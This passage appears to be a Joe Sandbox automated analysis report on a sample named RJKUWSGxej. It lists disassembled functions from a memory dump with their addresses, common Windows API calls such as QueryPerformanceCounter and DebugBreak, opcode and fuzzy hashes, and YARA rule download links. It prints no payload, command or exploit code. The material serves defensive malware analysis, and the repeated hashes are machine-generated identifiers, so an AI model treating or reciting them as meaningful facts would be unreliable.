Instruction ID: 2712a39c8456fcee7f01d0a824ef50725e6f8735840692164f55105787e13eeb
Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
Instruction Fuzzy Hash: DBB17F32A09B82C5EB94CF25E4812B933A5FB44B49F188136CEDD8B399DF39E495D311

Function 00007FF6C755B27C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6C755B2A8
GetCurrentThreadId.KERNEL32 ref: 00007FF6C755B2B6
GetCurrentProcessId.KERNEL32 ref: 00007FF6C755B2C2
QueryPerformanceCounter.KERNEL32 ref: 00007FF6C755B2D2

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
Instruction ID: a6ecddca5da22324b81cfc5d404b8a05b08b1ca669bdd64518fe53c535168143
Opcode Fuzzy Hash: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
Instruction Fuzzy Hash: F8112A26B14F018AEF00DF61E8542B833A4FB59799F440E36EAED867A4DF78D1549340

Function 00007FF6C752D320 Relevance: 3.3, APIs: 2, Instructions: 326threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF6C752D465
SwitchToThread.KERNEL32 ref: 00007FF6C752D495

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 1ddd28703dbe1c3b98edb21a237e8e30d6246af74f562787a6415a40b8681a1b
Instruction ID: 71dd18639ce65ad38f11c069819242f05b9662cdedf869d80c4b1bd5b02a03e1
Opcode Fuzzy Hash: 1ddd28703dbe1c3b98edb21a237e8e30d6246af74f562787a6415a40b8681a1b
Instruction Fuzzy Hash: E0D18E32B08B8586EB609F15D40937A73A1FB85B96F984236DADD87784DF7CE441C740

Function 00007FF6C751B6B0 Relevance: 3.3, APIs: 2, Instructions: 303COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF6C751B9D2
DebugBreak.KERNEL32 ref: 00007FF6C751B9E3

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 3c744e902eb8ccddad50df134e1a34f84f90643437d983836af5a64c10f9950f
Instruction ID: cf93250e5f80d2b25a97007d9a0533700134a2437749a7af1ab0d0cee55f2666
Opcode Fuzzy Hash: 3c744e902eb8ccddad50df134e1a34f84f90643437d983836af5a64c10f9950f
Instruction Fuzzy Hash: 57E18C32E09B8686EB119F6AD84427837A5FB44BDAF914235DADD877A4DF3CE481D300

Function 00007FF6C7500470 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6C74F4896,?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C7500531
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6C74F4896,?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C7500590

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: EnabledFeaturesState
String ID:
API String ID: 1557480591-0
Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
Instruction ID: 14e75809e01d69196b84991c7103b599a9d0a6e7530e03435e5764cf4982c42c
Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
Instruction Fuzzy Hash: 5251E437F0C6D606FF684E59949937A12839BD536AF898539CACED36C1CD7FD8428204

Function 00007FF6C74F8220 Relevance: 2.1, Strings: 1, Instructions: 834COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF6C74F82EE

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction ID: 5818d5591d16be0d45340df69b42a000ba4e23ac53f00c69ae2aefd58c36ebad
Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
Instruction Fuzzy Hash: BF62D3B3A15B4687EB08CF2AC45576D36A9FB94B89F05C036CA4D8B798DF38D910C780

Function 00007FF6C751FDD0 Relevance: 1.9, APIs: 1, Instructions: 439COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C7500C50: CreateEventW.KERNEL32 ref: 00007FF6C7500C91

Part of subcall function 00007FF6C7501630: QueryPerformanceCounter.KERNEL32 ref: 00007FF6C7501639

DebugBreak.KERNEL32 ref: 00007FF6C752058A

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 239665389a0cd627f3329a865a2d6bcfc1ff565c8885e7258fe4b1991b1b8a1f
Instruction ID: 999d2ebdb64eed95cbefd49db04baceeb546f7716b5fa4c8f427956190fa0883
Opcode Fuzzy Hash: 239665389a0cd627f3329a865a2d6bcfc1ff565c8885e7258fe4b1991b1b8a1f
Instruction Fuzzy Hash: 4442F631E19B8285EB018F2AF88527437A4FF58786F549239D9CDE2765EF3CA190E740

Function 00007FF6C75B7BA0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 00007FF6C75B7E0D

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: d5b68029aa416122ce9160fa44b138e07519b76c0a8e0ce365ee1a4a9db7f319
Instruction ID: 0163c6e729a57bc7cafdfa8a1105196d3252f8f39601549e95944c52b83c0385
Opcode Fuzzy Hash: d5b68029aa416122ce9160fa44b138e07519b76c0a8e0ce365ee1a4a9db7f319
Instruction Fuzzy Hash: D2D1A032E086468AEB159F71C44467D27A1BF4079AF919836DE8EC7695DF3CF882C780

Function 00007FF6C75235C0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6C7523B1C

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
Instruction ID: e60d9852121bb027ebdae95666bd383cef324703b935f8bc1470de26bb9a8df9
Opcode Fuzzy Hash: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
Instruction Fuzzy Hash: A542A032A18B8686EA598F1AE44827937A1FF417E6F844236CAED877D4CF3CE454D700

Function 00007FF6C7519A50 Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF6C751A256

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
API String ID: 0-2256439813
Opcode ID: 9561865640de96016b2ba035b3c714d5919757c2b64c2a30c842c485d175cea9
Instruction ID: 2b52353142ad46a827b53578d7c28160b1cc1da6f09e4ed935e222c0d3529f4b
Opcode Fuzzy Hash: 9561865640de96016b2ba035b3c714d5919757c2b64c2a30c842c485d175cea9
Instruction Fuzzy Hash: 36429D72A09B8686EE568F2AE84037877A4FF05B8AF554136CACD83361DF3DE461D740

Function 00007FF6C750E8A0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF6C750E8EB

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 08da8e7d348b2c4775dc81982e8ef5c1af3378a867f6579d987cd6cec49bf483
Instruction ID: 29ded8c9e0c1438726416963a925fbabea6412ba700a680c2fe4cbd62b6e6e0b
Opcode Fuzzy Hash: 08da8e7d348b2c4775dc81982e8ef5c1af3378a867f6579d987cd6cec49bf483
Instruction Fuzzy Hash: 5612D032B08A8682EA14DF16E44477973A9FB84B99FA44636DEDE87794DF3CE441C700

Function 00007FF6C75144D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6C7514713

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-3916222277
Opcode ID: 7285a5d3e7011dc1498913bc0e373055dafed2f257b2e969d5ecd2bcc723cead
Instruction ID: 74c2f6308325375420d03a15a314eb21cc49a6e86624e145caa97e4396fdbda5
Opcode Fuzzy Hash: 7285a5d3e7011dc1498913bc0e373055dafed2f257b2e969d5ecd2bcc723cead
Instruction Fuzzy Hash: F3D1C262A18A8282EA108F26E45027973A1FB41BE6F945335DAFE977D4DF3CE452C700

Function 00007FF6C7589080 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6C75890F0

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
Instruction ID: 0f9463e8585259609c650abe0f046e5b44e61bbdf2424aab91226a86dcaf20af
Opcode Fuzzy Hash: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
Instruction Fuzzy Hash: 54012773F146609DF761DBA5EC40ADD3BB5BB48358FA0402ADE4CA6A48DF349496C700

Function 00007FF6C7524390 Relevance: 1.0, Instructions: 955COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce3a2be2a967157a208b5469d4fb72d59352499977ff803ef967ee50981d88e4
Instruction ID: 4f1f2545a35774b7e5e8761ecfb1560574808eea9d2ed3dfff574ee326f8104e
Opcode Fuzzy Hash: ce3a2be2a967157a208b5469d4fb72d59352499977ff803ef967ee50981d88e4
Instruction Fuzzy Hash: 4F92E1A1F28B4685EE41CF26E8546B563A5BF45BC6F888236D9DED3761DF3CE8418300

Function 00007FF6C7515200 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446d39dcba5310dc36ab79b1d636cd559026c6356fa8d61ef1d74aeab44c5708
Instruction ID: 599cfc9401fc2f787dca6e44b8fe9e697d09eddaea28ba86bb7373ccbc7599de
Opcode Fuzzy Hash: 446d39dcba5310dc36ab79b1d636cd559026c6356fa8d61ef1d74aeab44c5708
Instruction Fuzzy Hash: 5D5263B2A1579682EE658F19C08437867A0FF15BA6F986235CEAC837D8DF7CD490C340

Function 00007FF6C75252E0 Relevance: .6, Instructions: 619COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
Instruction ID: 7c0b03a706f2f4af2ac108d37268cc6603cf30d93cfd358a5a519741f00e767e
Opcode Fuzzy Hash: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
Instruction Fuzzy Hash: 4A42AC72B18B4686EB10CF65E4441AD73A1FB48BDAF940576EE8E97B98DE3CE441C700

Function 00007FF6C7525C20 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
Instruction ID: b157c4742e2c6175689135496b8be8cb185d97c2892c86403867ec58e804b4b2
Opcode Fuzzy Hash: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
Instruction Fuzzy Hash: 6542C272F097468AEB10CFA6D4442BC33A2FB55BC9B844536DE8DA7B89DE38E455C340

Function 00007FF6C7512D30 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
Instruction ID: b01ef4d3c92a936710298e93c5f9d0287277219851dc9ccb53413e527833d7a3
Opcode Fuzzy Hash: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
Instruction Fuzzy Hash: 7E221622E19FC94AEA479F35A451375A7A4AF963C6F548332EDCF62761DF2DE0428300

Function 00007FF6C75117DF Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506d746ea8b936694054b37d1bee98c47b0ac3f7d8196d417aa1aba72c8e2176
Instruction ID: 5e67cc421029576fc6f82d1837dfd4579bb5ac38a2284855a876c36076fdec98
Opcode Fuzzy Hash: 506d746ea8b936694054b37d1bee98c47b0ac3f7d8196d417aa1aba72c8e2176
Instruction Fuzzy Hash: 48125921A19A4682EE648F26A44037967A5FF05BD7F945279CAEEC77E0DF3CE481D300

Function 00007FF6C752B4F0 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
